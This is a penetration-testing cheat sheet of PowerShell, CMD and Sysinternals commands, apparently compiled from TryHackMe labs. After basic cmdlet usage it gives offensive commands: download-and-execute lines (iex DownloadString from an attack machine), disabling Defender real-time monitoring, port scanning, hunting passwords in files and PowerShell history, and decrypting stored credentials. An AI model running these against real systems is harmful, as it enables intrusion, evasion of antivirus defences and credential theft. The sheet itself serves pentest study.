Useful commands in Powershell, CMD and Sysinternals
Powershell Overview
Cmdlet format:
Verb-Noun
the output of these cmdlets are objectsCommom verbs:
Get
,Start
,Stop
,Read
,Write
,New
,Out
.Get-Command
to list all commandsGet-Command Verb-*
orGet-Command *-Noun
to filter the command
Get-Help Command-Name
will output help on a command.
Object manipulation
|
Pass output from one cmdlet to anotherAn object will contain methods and properties. You can think of methods as functions that can be applied to output from the cmdlet and you can think of properties as variables in the output from a cmdlet
Verb-Noun | Get-Member
output methods and properties of the cmdletExample:
Get-Command | Get-Member -MemberType Method
One way of manipulating objects is pulling out the properties from the output of a cmdlet and creating a new object. This is done using the Select-Object cmdlet.
Example:
Get-ChildItem | Select-Object -Property Mode, Name
listing the directories and just selecting the mode and the name.
Useful flags
first - gets the first x object
last - gets the last x object
unique - shows the unique objects
skip - skips x objects
Filtering objects
Verb-Noun | Where-Object -Property PropertyName -operator Value
Verb-Noun | Where-Object {$_.PropertyName -operator Value}
uses the $_ operator to iterate through every object passed to the Where-Object cmdlet.Operators:
Contains
If any item in the property value is an exact match for the specified value/,EQ
If the property value is the same as the specified value,GT
If the property value is greater than the specified valueFull list of operators here
Example:
Get-Service | Where-Object -Property Status -eq Stopped
Checking the stopped processes
Sort objects
Verb-Noun | Sort-Object
Example:
Get-ChildItem | Sort-Object
sorting the list of directories
Source: TryHackMe - Throwback
Downloading files
certutil.exe -urlcache -f http://IP-OF-YOUR-WEBSERVER-WHERE-FILES-ARE-HOSTED/file-you-need name-you-want-to-give-the-file
(works also in cmd)
wget http://IP-OF-YOUR-WEBSERVER-WHERE-FILES-ARE-HOSTED/file-you-need -OutFile name-you-want-to-give-the-file
iex (New-Object Net.WebClient).DownloadString('http://IP-OF-YOUR-WEBSERVER-WHERE-FILES-ARE-HOSTED/file-you-need')
will load it in memory without writing it in the disk, we will the be able to run powerview command if we use it to load powerview for instance
Offensive Powershell
Disable AV
Set-MpPreference -DisableRealtimeMonitoring $true
Using modules
Import-Module Module
. .\Module.ps1
Enumeration
For manual enumeration with powershell check out my article here
Powershell Remoting
Enter-PSSession -ComputerName workstation-01
Enter-PSSession -ComputerName workstation-01 -Credential domain\Username
Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName workstation-01 -Credential domain\Username
connect to a remote powershell and excute command with ScriptBlock. other command we could do with scriptblock:ipconfig
,net user
,...Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
List AppLocker rules
Misc
Install-Module ActiveDirectoryModule -ScopeCurrentUser
Install a module without admin rightsGet-MpComputerStatus
Check Windows Defender StatusGet-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone
Test AppLocker policyGet-HotFix | ft -AutoSize
display hotfixesGet-WmiObject -Class Win32_Product | select Name, Version
display installed softwaregci (Get-ChildItem)
list named pipesselect-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password
Search file contentsGet-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
search for file extensionsView Sticky Notes data
Enumerate schedule task with Get-ScheduledTask
Get-ScheduledTask | select TaskName,State
Get-LocalUser
check the description field of local usersGet-WmiObject -Class Win32_OperatingSystem | select Description
Print computer description fields
DOS CMD
Downloading files
certutil.exe -urlcache -f http://IP-OF-YOUR-WEBSERVER-WHERE-FILES-ARE-HOSTED/file-you-need name-you-want-to-give-the-file
curl.exe -o name-you-want-to-give-the-file http://IP-OF-YOUR-WEBSERVER-WHERE-FILES-ARE-HOSTED/file-you-need
Encode and Decode files
certutil -encode file1 encodedfile
certutil -decode encodedfile file2
System Enumeration
If we want to grep on specific information we can use
findstr
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
If we want to see patches and update
wmic qfe
wmic qfe get Caption,Description,HotFixID,InstalledOn
List the drives
wmic logicaldisk
list drives
schtasks
query scheduled taskschtasks /query /fo LIST /v
driverquery
will list installed driverstasklist /svc
get the list of running processesset
display all environment variableswmic product get name
display installed softwareicacls c:\Windows\System32\config\SAM
check permissions on the SAM file[environment]::OSVersion.Version
check OS versioncmd /c echo %PATH%
review path variable
User Enumeration
whoami
will give info on the current userwhoami /priv
will give info on the current user and their privwhoami /groups
will give info on groups the current user is innet user
ornet users
will list the user on the machinequery user
logged in usersecho %USERNAME%
current usernet user username
will list info about the with the username mentionnednet localgroup
net localgroup groupname
will give info on groupqwinsta
orquery session
other users logged in simultaneouslynet accounts
Get Password Policy & Other Account Information
Network Enumeration
ipconfig
oripconfig /all
arp -a
route print
netstat -ano
list active connections-a
: Displays all active connections and listening ports on the target system.-n
: Prevents name resolution. IP Addresses and ports are displayed with numbers instead of attempting to resolves names using DNS.-o
: Displays the process ID using each listed connection.Any port listed as “LISTENING” that was not discovered with the external port scan can present a potential local service. This is when we might need to use port forwarding to investigate the service.
Check what service runs on a specific port (in the example we will use 8080
Scan ports
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "Port $_ is open!"} 2>$null
scan some ports on a specific IP
Hunting passwords
findstr /si password *.txt
will search for the string "password" in txt files/si
means it searches in the current directory and all subdirectories (s) and ignore the case (i).findstr /si password *.txt *.ini *.config *.sql
same but also in ini, sql and config filesfindstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
Search file contents for stringfindstr /spin "password" *.*
another wayUnattend.xml files might have passwords in plaintext or base64 encoded
C:\Users\username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
powershell cmd history is also worth looking atTo check where it is we can use this command
(Get-PSReadLineOption).HistorySavePath
We can try to read it
gc (Get-PSReadLineOption).HistorySavePath
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
Retrieve the contents of all Powershell history files that we can access as our current user
Powershell credentials are protected with DPAPI. If we can read them we could recover then in cleartext
$credential = Import-Clixml -Path 'C:\scripts\pass.xml'
$credential.GetNetworkCredential().username
$credential.GetNetworkCredential().password
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
search for file extensionswhere /R C:\ *.config
another wayC:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
Looking for passwords in Sticky notesstrings plum.sqlite-wal
Using strings to view DB File contentsOther files worth checking
cmdkey /list
list saved credentialsrunas /savecred /user:domain\user "COMMAND HERE"
run command as another user
AV Enumeration
sc query windefend
will show if Defender is runningsc queryex type= service
will list all running servicenetsh advfirewall firewall dump
check for firewallnetsh firewall show state
similar older commandnetsh firewall show config
will show the config of the firewall, useful to see blocked ports and other
Execute dll files
We can use Rundll32
Execute powershell file
Sometimes powershell won't launch so we will have to use cmd. It is possible to execute a ps1 script using this trick
We take the necessary script in our attacking machine
python3 -m http.server 80
we serve it to our target with an http serverecho IEX(New-Object Net.WebClient).DownloadString('http://ATTACK-MACHINE-IP/script.ps1
we can use this command to download and execute it in our target.
powershell -file file.ps1
Sysinternals
Pipelist
Pipelist is useful to enumerate instances of pipes
pipelist.exe /accepteula
enumerate instances of named pipes.
Accesschk
Accesschk is useful to enumerate permissions
accesschk.exe /accepteula
accesschk.exe -wuvc Everyone *
list service we can write and to which everyone has access.\accesschk64.exe /accepteula -uwdq "C:\Program Files\"
List of user groups with read and write privs
schtasks
schtasks will let us enumerate scheduled tasks
schtasks /query /fo LIST /v
LOLBAS (living off the land binaries)
Resources
Last updated